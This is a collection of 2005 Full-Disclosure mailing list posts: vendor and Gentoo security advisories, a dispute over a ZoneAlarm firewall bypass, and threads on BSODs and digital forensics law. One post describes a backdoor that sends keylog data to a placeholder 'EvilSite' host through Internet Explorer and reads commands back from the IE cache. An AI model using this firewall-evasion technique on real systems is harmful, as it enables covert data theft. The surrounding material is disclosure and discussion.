> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, and 
> ZoneAlarm Security Suite version 6.0 or later automatically protect 
> against this attack in the default configuration.
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security, and 
> ZoneAlarm Security Suite version 5.5 are protected against this attack 
> by enabling the "Advanced Program Control" feature.
>
> Check Point Integrity client versions 6.0 and 5.5 are protected 
> against this attack by enabling the "Advanced Program Control" feature.
>
>
> Affected Products:
>
> ZoneAlarm free versions lack the "Advanced Program Control"
> feature and are therefore unable to prevent this bypass technique.
>
>
> Recommended Actions:
>
> Subscribers should upgrade to the latest version of their ZoneAlarm 
> product or enable the "Advan

Re: [Full-disclosure] Bigger burger roll needed

[Steve Friedl]

On Mon, Oct 03, 2005 at 10:37:05AM -0600, Bruce Ediger wrote:
> Does any kind of evidence (apart from PR-flack-based spin) exist
> for this conclusion?

This is what Microsoft tells me what they gather from the online error
reporting and crash analysis, and it comports with my experience as
well. I know I've caused my own share when I was writing print drivers:
no way those were Microsoft's fault.

I suppose that even if this data is as claimed, it could be skewed by
those who primarily see MS-caused faults choosing not to submit these
reports. I very much doubt the details are public, so one is probably
left to the mercy of whether you believe Microsoft or not.

Steve

-- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bypassing Personal Firewall, is it that* hard?

[Thierry Zoller]

Bipin,
That's very old news, we were discussing an approach a bit more elgant
than this. And yes, it's that hard nowadays Kerio will easily block
your bat file due to it's integrated HIPS. (although a fonction which
can be very annoying sometimes.)

BG> the batch file will get executed & Internet explorer will happily send
BG> the DATA. This trick can be used to send OUTPUT as well as get
BG> input... without trigering the firewall.

Thierry Zoller
mailto:[EMAIL PROTECTED]


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Bypassing Personal Firewall, is it that* hard?

[Bipin Gautam]

hello list,
Lately 'Debasis Mohanty' was refreshing some old issues. Anyways... is
Bypassing Personal Firewall & let an internal (evil) application
communicate with the external world,  the hard. I mean... OK try
this Lets.. me give you a simple concept. I'll call it
'passive communication' ( in lack of better world)

say... a backdoor want to communicate to its server... It can do
is, use a trusted internal application to do the job. Suppose; it
creates a batch file run the batch file  (evil.bat) & executes this
command

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=submit&f=___KeyLog__

the batch file will get executed & Internet explorer will happily send
the DATA. This trick can be used to send OUTPUT as well as get
input... without trigering the firewall.

To get input; the backdoor can do is... say, run similar BAT script:

Internet Explorer\> iexplore.exe www.EvilSite.com/?cmd=ANY_NEW_COMMANDS

well... the history of the page 
www.EvilSite.com/?cmd=ANY_NEW_COMMANDS will be there in the IE
cache... Then the backdoor can do is... RUN a string based 'GREP' in
the IE cache & see if there is any new job to acomplish.

just a rough theory... but ya its POSSIBLE; to let a internal backdoor
have I/O with its server without trigering the firewall alert

---
yap it does work... using the same trick can't the backdoor happily
communicate with its server using the trick

On 9/30/05, Zone Labs Security Team <[EMAIL PROTECTED]> wrote:
> Zone Labs response to "Bypassing Personal Firewall (Zone Alarm Pro)
> Using DDE-IPC"
>
> Overview:
>
> Debasis Mohanty published a notice about a potential security issue
> with personal firewalls to several security email lists on
> September 28th, 2005.   Zone Labs has investigated his claims
> and has determined that current versions of Zone Labs and
> Check Point end-point security products are not vulnerable.
>
>
> Description:
>
> The proof-of-concept code published uses the Windows API function
> ShellExecute() to launch a trusted program that is used to access
> the network on behalf of the untrusted program, thereby accessing
> the network without warning from the firewall.
>
>
> Impact:
>
> If successfully exploited, a malicious program may be able to
> access the network via a trusted program.   The ability to
> access the network would be limited to the functionality of the
> trusted program.
>
>
> Unaffected Products:
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
> and ZoneAlarm Security Suite version 6.0 or later automatically
> protect against this attack in the default configuration.
>
> ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Wireless Security,
> and ZoneAlarm Security Suite version 5.5 are protected against
> this attack by enabling the "Advanced Program Control" feature.
>
> Check Point Integrity client versions 6.0 and 5.5 are protected
> against this attack by enabling the "Advanced Program Control" feature.
>
>
> Affected Products:
>
> ZoneAlarm free versions lack the "Advanced Program Control"
> feature and are therefore unable to prevent this bypass technique.
>
>
> Recommended Actions:
>
> Subscribers should upgrade to the latest version of their
> ZoneAlarm product or enable the "Advanced Program Control" feature.
>
>
> Related Resources:
>
> Zone Labs Security Services http://www.zonelabs.com/security
>
>
> Contact:
>
> Zone Labs customers who are concerned about this vulnerability or
> have additional technical questions may reach our Technical Support
> group at: http://www.zonelabs.com/support/.
>
> To report security issues with Zone Labs products contact
> [EMAIL PROTECTED] Note that any other matters sent to this
> email address will not receive a response.
>
>
> Disclaimer:
>
> The information in the advisory is believed to be accurate at the
> time of publishing based on currently available information. Use
> of the information constitutes acceptance for use in an AS IS
> condition. There are no warranties with regard to this information.
> Neither the author nor the publisher accepts any liability for any
> direct, indirect, or consequential loss or damage arising from use
> of, or reliance on, this information. Zone Labs and Zone Labs
> products, are registered trademarks of Zone Labs LLC. and/or
> affiliated companies in the United States and other countries.
> All other registered and unregistered trademarks represented in
> this document are the sole property of their respective
> companies/owners.
>
> Copyright: (c)2005 Zone Labs LLC All rights reserved. Zone Labs,
> TrueVector, ZoneAlarm, and Cooperative Enforcement are registered
> trademarks of Zone Labs LLC The Zone Labs logo, Check Point
> Integrity and IMsecure are trademarks of Zone Labs, LLC. Check Point
> Integrity protected under U.S. Patent No. 5,987,611. Reg. U.S. Pat.
> & TM Off. Cooperative Enforcement is a service mark of Zone Labs LLC.
> All other trademarks are the property of their respective owners.

[Full-disclosure] RE: Full-Disclosure Digest, Vol 8, Issue 3

[Cooper, Christopher]

* Jason Coombs:  /* There is simply no way for law enforcement to know the 
difference between innocent and guilty persons based on hard drive data
circumstantial evidence. */
Jason,

Are you stumping for work as a defense expert?  I hope so, because I know 
several Law Enforcement Officers who would love to challenge your positions in 
court.

You are over gerneralization an issue and group of people. It IS possible for 
law enforcement or anyone examining data to know the difference between 
innocent and guilty persons based on hard drive data.  One simply needs to look 
beyond the general information provided to them from the software tools. Can 
you give me an example of a trojan, worm, or another program which has added 
the last USB device installed in the Windows Registry, or how about a program, 
worm, trojan - which caused something to be added to the last typed URL?

Off of Subject: Do you plan to fix the links from your site at: 
http://www.science.org/jasonc/writing.html - most of the links no longer exist 
or don't have your name on the published line. Thanks and cheers.

-C...
<>___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Different Claims by ZoneLabs on the "Bypassing PersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

[Debasis Mohanty]

>> Paul Laudanski
>> What I'm saying is that the vendor never claimed ZAP versions prior to 5
are not vulnerable in the report.  

Funny Paul!! You are simple exaggerating upon the same point again and again
in a new style each time. Well, They don't even say that ZAP versions prior
to v5 are vulnerable in their advisory. 

Can you say Product X Pro is un-affected to a particular vulnerability while
Product X (ver 4x / 5x ..) are vulnerable.. NO ! The statement is not
specific and will keep the customers/users clueless whether or not their
firewall version is weak.. The vendor needs to be specific here saying which
versions of Product X Pro is un-affected and which are not.

You many also like to read the ZA user's comments on this issue posted at
Zone Labs's user forum - 
http://forums.zonelabs.com/zonelabs/board/message?board.id=security&message.
id=13104#M13104


Its really funny to see that the vendor wants to keep their EGO up-2-date by
covering up this issue with their latest version 6.0 =))



Gud Luck !! 

-D





-Original Message-
From: Paul Laudanski [mailto:[EMAIL PROTECTED] 
Sent: Monday, October 03, 2005 9:06 PM
To: Debasis Mohanty
Cc: 'Zone Labs Security Team'; bugtraq@securityfocus.com;
full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Different Claims by ZoneLabs on the
"Bypassing PersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

On Mon, 3 Oct 2005, Debasis Mohanty wrote:

> Paul,
> 
> >> This does not include the version 3.7.159 you are testing.  
> 
> Didn't get the meaning by what you mean by "This does not include". Do 
> u mean whether or not version 3.7.159 is vulnerable it shouldn't be 
> conscidered??

What I'm saying is that the vendor never claimed ZAP versions prior to 5 are
not vulnerable in the report.  So you're comment is redundant.  Simply
upgrade your version.  Ciao.

--
Paul Laudanski, Microsoft MVP Windows-Security CastleCops(SM),
http://castlecops.com



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Careless Law Enforcement Computer ForensicsLacking InfoSec Expertise Causes Suicides

[Steve Kudlak]

I have been following this in the background because a number of my 
friends who got zapped in the high tech spindown out here in California 
have ended up in computer forensics and datamining because that's what 
gets money these days. Some are happy and some are a bit concerned. I am 
currently disabled and on good days I get the feeling I want to jump 
back in and on bad days I sleep to 3pm.


It would be interesting to look at these questions from an international 
perspective. I am sure there is some manoevering around by say the 
"Anti-Sex Tourism " Task Forces to see if they can get things done in 
the most sympathetic areas. Right now much of the prosecutions happen in 
the US because the US Federal Government has a lot of power.  Federal 
Prosecution often proceeds by sort of getting a bunch of warrants, going 
seizing someone's property then looking into everything they could have 
possibly done wrong and threaten the person involved and thenoffereing 
them a deal where they become a convicted felon for something. This is 
what happened in the case of US Artist Steve Kurtz who was going to be 
charged with bioterrorism and it is now down to questionable mail fraud.


If things proceed like this it is good to know this is what might be 
contributiing too with the fruits of one's labours. So it would be good 
to look into this stuff and find how it actually works, although yes it 
would have to be from an international perspective. Speaking of France I 
mean the US has always been trying to get Roman Polanski back on US soil.;)


Have Fun,
Sends Steve



Paul Schmehl wrote:

--On Monday, October 03, 2005 09:38:16 -0400 Lane Weast 
<[EMAIL PROTECTED]> wrote:



In theory, what you say is incorrect.

They may take you in but, in court they have to prove it was yours.
It is not your responsibility to prove your innocence.
It is their responsibility to prove your guilt.

Whenever I read stuff like this on an international list, I always 
wonder if the people posting understand that the rest of the world 
doesn't necessarily work the way your little corner of the world works.


For example, French law, which is based upon Napoleonic law, places 
the burden of proof on the defendant.  You are guilty unless you can 
prove your innocent.


So, your comments almost certainly do not apply to many people reading 
here.  Which causes one to wonder - what value do they have to the 
audience reading?


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/





___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Micheal Espinola Jr]

err, But Steve's conclusion is consistent with my own...

On 10/3/05, Micheal Espinola Jr <[EMAIL PROTECTED]> wrote:
> Bruce, I don't think you are going to find hard "evidence" for either
> conclusion.  But Bruce's conclusion is consistent with my own
> experiences, and that of many other Administrators that I discuss
> issues like this with.
>
> Since its inception, supporting NT 3.0 beta and onward, I have been
> dealing with BSOD's.  In total, there have been comparatively very few
> times were it was a direct fault of MS code.  It has very commonly
> been in relation to 3rd party drivers that needed reworking or
> updating by the 3rd-party manufacturer.
>
> This is not PR spin (of which I don't think you could find any
> published PR spin for either side of this argument either).  This is
> real world experience with the NT+ products across i386 and Alpha
> hardware platforms using peripheral devices from many different major
> manufactures.  There are admins on both sides of the anti-MS fence
> that I communicate with that would agree with this conclusion.
>
>
>
> On 10/3/05, Bruce Ediger <[EMAIL PROTECTED]> wrote:
> > On Mon, 3 Oct 2005, Steve Friedl wrote:
> >
> > > The majority of BSODs are caused by buggy third-party drivers and malware
> > > (rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?
> >
> > Does any kind of evidence (apart from PR-flack-based spin) exist for this
> > conclusion?
> >
> > Can you point me to it?
> >
> > Sincerely,
> > Bruce Ediger
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
> --
> ME2  
>


--
ME2  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Micheal Espinola Jr]

Bruce, I don't think you are going to find hard "evidence" for either
conclusion.  But Bruce's conclusion is consistent with my own
experiences, and that of many other Administrators that I discuss
issues like this with.

Since its inception, supporting NT 3.0 beta and onward, I have been
dealing with BSOD's.  In total, there have been comparatively very few
times were it was a direct fault of MS code.  It has very commonly
been in relation to 3rd party drivers that needed reworking or
updating by the 3rd-party manufacturer.

This is not PR spin (of which I don't think you could find any
published PR spin for either side of this argument either).  This is
real world experience with the NT+ products across i386 and Alpha
hardware platforms using peripheral devices from many different major
manufactures.  There are admins on both sides of the anti-MS fence
that I communicate with that would agree with this conclusion.



On 10/3/05, Bruce Ediger <[EMAIL PROTECTED]> wrote:
> On Mon, 3 Oct 2005, Steve Friedl wrote:
>
> > The majority of BSODs are caused by buggy third-party drivers and malware
> > (rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?
>
> Does any kind of evidence (apart from PR-flack-based spin) exist for this
> conclusion?
>
> Can you point me to it?
>
> Sincerely,
> Bruce Ediger
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>


--
ME2  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Bruce Ediger]

On Mon, 3 Oct 2005, Steve Friedl wrote:


The majority of BSODs are caused by buggy third-party drivers and malware
(rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?


Does any kind of evidence (apart from PR-flack-based spin) exist for this
conclusion?

Can you point me to it?

Sincerely,
Bruce Ediger
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [CIRT.DK - Advisory] Windows XP SP2 Local TFTP HEAP based Overflow

[CIRT.DK Advisory]

[Description]
The Windows XP tftp.exe software is vulnerable to a local Heap Based
overflow, 
allowing to run arbitrary commands on the system as the user issuing the
overflow.

[Complete advisory]
CIRT.DK Advisory 38 can be read at http://www.cirt.dk/

Regards
CIRT.DK

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200510-02 ] Berkeley MPEG Tools: Multiple insecure temporary files

[Thierry Carrez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Berkeley MPEG Tools: Multiple insecure temporary files
  Date: October 03, 2005
  Bugs: #107344
ID: 200510-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


The Berkeley MPEG Tools use temporary files in various insecure ways,
potentially allowing a local user to overwrite arbitrary files.

Background
==

The Berkeley MPEG Tools are a collection of utilities for manipulating
MPEG video technology, including an encoder (mpeg_encode) and various
conversion utilities.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  media-video/mpeg-tools  < 1.5b-r2  >= 1.5b-r2

Description
===

Mike Frysinger of the Gentoo Security Team discovered that mpeg_encode
and the conversion utilities were creating temporary files with
predictable or fixed filenames. The 'test' make target of the MPEG
Tools also relied on several temporary files created insecurely.

Impact
==

A local attacker could create symbolic links in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When
the utilities are executed (or 'make test' is run), this would result
in the file being overwritten with the rights of the user running the
command.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Berkeley MPEG Tools users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-video/mpeg-tools-1.5b-r2"

References
==

  [ 1 ] CAN-2005-3115
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-3115

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-02.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Careless Law Enforcement Computer ForensicsLacking InfoSec Expertise Causes Suicides

[Paul Schmehl]

--On Monday, October 03, 2005 09:38:16 -0400 Lane Weast 
<[EMAIL PROTECTED]> wrote:



In theory, what you say is incorrect.

They may take you in but, in court they have to prove it was yours.
It is not your responsibility to prove your innocence.
It is their responsibility to prove your guilt.

Whenever I read stuff like this on an international list, I always wonder 
if the people posting understand that the rest of the world doesn't 
necessarily work the way your little corner of the world works.


For example, French law, which is based upon Napoleonic law, places the 
burden of proof on the defendant.  You are guilty unless you can prove your 
innocent.


So, your comments almost certainly do not apply to many people reading 
here.  Which causes one to wonder - what value do they have to the audience 
reading?


Paul Schmehl ([EMAIL PROTECTED])
Adjunct Information Security Officer
University of Texas at Dallas
AVIEN Founding Member
http://www.utdallas.edu/ir/security/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200510-01 ] gtkdiskfree: Insecure temporary file creation

[Thierry Carrez]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200510-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: gtkdiskfree: Insecure temporary file creation
  Date: October 03, 2005
  Bugs: #104565
ID: 200510-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


gtkdiskfree is vulnerable to symlink attacks, potentially allowing a
local user to overwrite arbitrary files.

Background
==

gtkdiskfree is a GTK-based GUI to show free disk space.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  app-admin/gtkdiskfree < 1.9.3-r1  >= 1.9.3-r1

Description
===

Eric Romang discovered that gtkdiskfree insecurely creates a
predictable temporary file to handle command output.

Impact
==

A local attacker could create a symbolic link in the temporary files
directory, pointing to a valid file somewhere on the filesystem. When
gtkdiskfree is executed, this would result in the file being
overwritten with the rights of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All gtkdiskfree users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-admin/gtkdiskfree-1.9.3-r1"

References
==

  [ 1 ] CAN-2005-2918
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2918
  [ 2 ] Original Advisory
http://www.zataz.net/adviso/gtkdiskfree-09052005.txt

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200510-01.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Different Claims by ZoneLabs on the "Bypassing PersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

[Paul Laudanski]

On Mon, 3 Oct 2005, Debasis Mohanty wrote:

> Paul, 
> 
> >> This does not include the version 3.7.159 you are testing.  
> 
> Didn't get the meaning by what you mean by "This does not include". Do u
> mean whether or not version 3.7.159 is vulnerable it shouldn't be
> conscidered??

What I'm saying is that the vendor never claimed ZAP versions prior to 5 
are not vulnerable in the report.  So you're comment is redundant.  Simply 
upgrade your version.  Ciao.

-- 
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Careless Law Enforcement Computer ForensicsLacking InfoSec Expertise Causes Suicides

[Michael Holstein]

The stash was in the bushes out side the residence. The kid and anyone
else passing by had access to it. Reasonable doubt of ownership exists.


Reasonable doubt costs money.

~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Micheal Espinola Jr]

While its easy to recognize your point, it's also quite moot.

The supportability issues of long ago, are just that - long ago.  The
customer base was, when the PC market first expanded and continues to
be, vastly larger from when computer companies offered that type of
service.  ...and at at much heftier price I might add.

Lets not forget that back in the day, hardware and software
combinations were a tightly controlled package deal.  The PC market
expansion changed that forever, and the multitude of hardware/software
combination have long since made the support you are longing for an
impossibility to maintain.

However, those of us that have discovered significant flaws in the MS
OS over the years know that MS takes bugs and flaws very seriously. 
Over the course of the past 10 years, I have had MS supply me with a
patch, within hours of a bug report, on many occasions.

This type of service certainly can't be expected or applied to all
types of errors and circumstance, many of which strongly depend on
unlucky combinations of hardware and 3rd-party drivers.

FWIW IME, most users know what a BSOD looks like (a "blue screen"),
but don't know it by that acronym.

On 10/3/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>
> One acronym: BSOD.  Why have users learned what it is, and grown accepting of
> seeing one?  Do you know any Windows users who have *never* encountered one?
> How many Windows users would believe that before Microsoft, vendors actually
> would take a *single* crash reported by *one* user seriously enough to
> investigate and produce a bugfix, and that vendors would escalate to the point
> of sending developers to the customer site if a system crashed multiple times
> and no fix was in sight in a week?
>
> For all its monopolistic abuses, the single worst thing Microsoft has done
> for the computer industry is lowered user expectations regarding software.

--
ME2  
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Kaspersky Antivirus Library Remote Heap Overflow

[list]

Date
October 3, 2005

Vulnerability
The Kaspersky Antivirus Library provides file format support for virus 
analysis. During analysis of cab files Kaspersky is vulnerable to a heap 
overflow allowing attackers complete control of the system(s) being protected. 
This vulnerability can be exploited remotely without user interaction in 
default configurations through common protocols such as SMTP, SMB, HTTP, and 
FTP.

Impact
Successful exploitation of Kaspersky protected systems allows attackers 
unauthorized control of data and related privileges. It also provides leverage 
for further network compromise. Kaspersky Antivirus Library implementations are 
likely vulnerable in their default configuration.

Affected Products
Due to the library’s OS independent design and core functionality: it is likely 
this vulnerability affects a substantial portion of Kaspersky’s gateway, 
server, and client antivirus enabled product lines on most platforms.

http://www.kaspersky.com/products

Note: Kaspersky’s antivirus OEM product line is a program where vendors may 
license the vulnerable library. The following link is a list containing some of 
the Kaspersky partners with products also likely affected by this 
vulnerability. Refer to your vendor for specifics.

http://www.kaspersky.com/oemsuccess

Credit
This vulnerability was discovered and researched by Alex Wheeler.

Contact
[EMAIL PROTECTED]

Advisory Details
http://www.rem0te.com/public/images/kaspersky.pdf


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Steve Friedl]

On Mon, Oct 03, 2005 at 08:50:27AM -0400, [EMAIL PROTECTED] wrote:
> One acronym: BSOD.  Why have users learned what it is, and grown accepting of
> seeing one?  Do you know any Windows users who have *never* encountered one?

The majority of BSODs are caused by buggy third-party drivers and malware
(rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?

> How many Windows users would believe that before Microsoft, vendors actually
> would take a *single* crash reported by *one* user seriously enough to
> investigate and produce a bugfix, and that vendors would escalate to the point
> of sending developers to the customer site if a system crashed multiple times
> and no fix was in sight in a week?

Before Microsoft, you got your hardware and OS from the same vendor, so
there was a much larger revenue stream to support that kind of service.
When you pay $100-ish (OEM) for your operating system, it's not so clear
that anybody really ought to expect Bill to get in the car and swing by
on his way home.

Steve

--- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Careless Law Enforcement Computer ForensicsLacking InfoSec Expertise Causes Suicides

[Lane Weast]

In theory, what you say is incorrect.

They may take you in but, in court they have to prove it was yours.
It is not your responsibility to prove your innocence.
It is their responsibility to prove your guilt.

In fact, there are more that a couple cases where the prosecutor told
the jury the defenses job was to prove the defendant innocent of the
charges. Which shortly there after resulted in a mis-trial.

The defenses job is to call into question the evidence used to attempt
to prove guilt. There by providing reasonable doubt.

The stash was in the bushes out side the residence. The kid and anyone
else passing by had access to it. Reasonable doubt of ownership exists.

In my opinion there is a big difference. 
Additionally there exists "Jury Nullification" which most prosecutors
will dismiss you from Jury duty if you say you are aware of its
existence. 

Def: The Jury has a responsibility to vote their conscience. If the law
is unjust the jury has the right to refuse to convict. With out this,
there is no need for a jury to act as a balance to the law.

Lane








-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Holstein
Sent: Monday, October 03, 2005 9:17 AM
To: Full-Disclosure
Subject: Re: [Full-disclosure] Careless Law Enforcement Computer
ForensicsLacking InfoSec Expertise Causes Suicides


> As long as the possession itself is a crime, this is just a waste of 
> resources.  I tend to agree that the current situation in most 
> countries is difficult because of the elusive nature of purely 
> electronic evidence.

Old problem, new kind of evidence .. if someone were to stash their dope

in my bushes while running from the cops, and that's later discovered by

my neighbor's kid .. guess who's going to end up down at the station 
looking stupid? .. ME.

Possession is 9/10 of the law. Once you've got dirt on your hands, it's 
your responsibility to prove it isn't yours. Unfortunately, in the 
digital world, that means you've got to be able to afford an expert to 
rebut the techie on the prosceution's payroll.

Curiously, here in Ohio, we have a law that says (in part) that the 
police must *prove* that any digital kiddie porn is a "real" kid, and 
not an image altered to look like one. Wrong or right, that little 
loophole has aquitted several defendents that have the means to hire an 
expert witness.

Michael Holstein CISSP GCIA
Cleveland State University
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Careless Law Enforcement Computer Forensics Lacking InfoSec Expertise Causes Suicides

[Michael Holstein]

As long as the possession itself is a crime, this is just a waste of
resources.  I tend to agree that the current situation in most
countries is difficult because of the elusive nature of purely
electronic evidence.


Old problem, new kind of evidence .. if someone were to stash their dope 
in my bushes while running from the cops, and that's later discovered by 
my neighbor's kid .. guess who's going to end up down at the station 
looking stupid? .. ME.


Possession is 9/10 of the law. Once you've got dirt on your hands, it's 
your responsibility to prove it isn't yours. Unfortunately, in the 
digital world, that means you've got to be able to afford an expert to 
rebut the techie on the prosceution's payroll.


Curiously, here in Ohio, we have a law that says (in part) that the 
police must *prove* that any digital kiddie porn is a "real" kid, and 
not an image altered to look like one. Wrong or right, that little 
loophole has aquitted several defendents that have the means to hire an 
expert witness.


Michael Holstein CISSP GCIA
Cleveland State University
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Valdis . Kletnieks]

On Mon, 03 Oct 2005 07:49:33 EDT, "J. Oquendo" said:
> 
> On Mon, 3 Oct 2005, Randall M wrote:
> > is a known fact that the major cause of computer criminal acts is the result
> > of careless and uneducated users. I have said it again and again, the "User"
> > is the best defense any Admin can have.

> by someone who didn't have a clue. The user is the biggest security risk
> and THAT is a known and published fact, not vice versa.

Umm.. That's exactly what Randall said - *security-unclued* users are the
biggest risk, and the sysadmin's best defense is having trained and clued
users.



pgp5dVimAoO4S.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Bigger burger roll needed

[Valdis . Kletnieks]

On Mon, 03 Oct 2005 07:49:33 EDT, "J. Oquendo" said:
> 
> On Mon, 3 Oct 2005, Randall M wrote:
> 
